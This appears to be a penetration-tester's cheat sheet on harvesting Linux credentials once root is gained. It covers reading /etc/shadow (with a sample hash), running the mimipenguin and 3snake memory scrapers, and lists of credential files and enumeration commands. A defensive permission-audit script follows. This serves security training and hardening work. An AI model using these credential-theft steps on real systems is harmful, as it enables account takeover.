## ETC/SHADOW

Requires root level privileges.

STEP 1: Cat the shadow file, located in /etc, with root privileges:

```bash
cat /etc/shadow
```

Example:

```bash
# NIX sha512crypt hash
root:$6$52450745$kSka2p8bFuSmoVT1tzOyyuaREkkKBcCNqoDKzYiJL9RaE8yMnPgh2XzzF0NDrUhgrcLwg78xslw5pJiypEdFX/
```

## MIMIPENGUIN

Tool inspired by mimikatz that extracts, on Linux, the contents of known offsets where cleartext passwords may be stored. Requires root level privileges.

https://github.com/huntergregal/mimipenguin

STEP 1: Git clone mimipenguin:

```bash
git clone https://github.com/huntergregal/mimipenguin.git
```

STEP 2: Execute mimipenguin with sudo or root privileges:

```bash
sudo mimipenguin
```

## 3SNAKE

Targets rooted servers: reads memory from the sshd and sudo system calls that handle password-based authentication.

https://github.com/blendin/3snake

STEP 1: Git clone 3snake:

```bash
git clone https://github.com/blendin/3snake.git
```

STEP 2: Build 3snake binary.

STEP 3: Execute 3snake on a target system with root privileges:

```bash
sudo 3snake
```

## PROCDUMP-FOR-LINUX

No known techniques have been released for dumping credentials out of memory using the new Linux 'procdump', but I figured I would include it for others to explore.

https://github.com/Microsoft/ProcDump-for-Linux

## OTHER PLACES

List of other places or commands on a Linux machine to enumerate passwords, keys, tickets, or hashes.

### LOCATIONS

```bash
/home/*/.bash_history
/home/*/.mysql_history
/etc/cups/printers.conf
/home/*/.ssh/
/tmp/krb5cc_*
/home/*/.gnupg/secring.gpg
```

### COMMANDS

```bash
# getent passwd
# pdbedit -L -w
# ypcat passwd
# klist
```
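
A defender's check for the locations listed above, as an added example that is not part of the original page: it reports any of those files (plus `/etc/shadow`) that are readable or writable by users outside the owner and group. The function name `audit_cred_perms` and its optional root-prefix argument are assumptions made for this example.

```shell
# Added example (not from the original page): permission audit of the
# credential locations this page lists.
#
# Usage: audit_cred_perms          # live filesystem, run as root
#        audit_cred_perms /mnt/img # hypothetical prefix: mounted image or test tree
#
# Prints one path per line for every file with "other" read or write bits set.
# Returns 0 when nothing is exposed, 1 when at least one file is.
# Assumption: the prefix contains no whitespace or glob characters.
audit_cred_perms() {
    local root="${1:-}" out="" pattern path hits

    for pattern in \
        '/etc/shadow' \
        '/home/*/.bash_history' \
        '/home/*/.mysql_history' \
        '/etc/cups/printers.conf' \
        '/home/*/.ssh' \
        '/tmp/krb5cc_*' \
        '/home/*/.gnupg/secring.gpg'
    do
        # Left unquoted on purpose so the shell expands the glob.
        for path in ${root}${pattern}; do
            # An unmatched glob stays literal; skip it.
            [ -e "$path" ] || continue
            # -perm -004: world-readable, -perm -002: world-writable.
            # Public-key material under .ssh is excluded, it is not a secret.
            hits=$(find "$path" -type f \( -perm -004 -o -perm -002 \) \
                       ! -name '*.pub' ! -name 'authorized_keys')
            if [ -n "$hits" ]; then
                out="${out}${hits}
"
            fi
        done
    done

    printf '%s' "$out"
    [ -z "$out" ]
}
```

Group bits are deliberately not flagged, because some distributions ship `/etc/shadow` readable by a dedicated group; tighten the `find` test if your baseline is owner-only.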